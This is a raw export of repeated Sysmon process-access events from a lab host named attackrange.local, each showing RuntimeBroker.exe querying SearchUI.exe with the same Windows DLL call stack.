12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
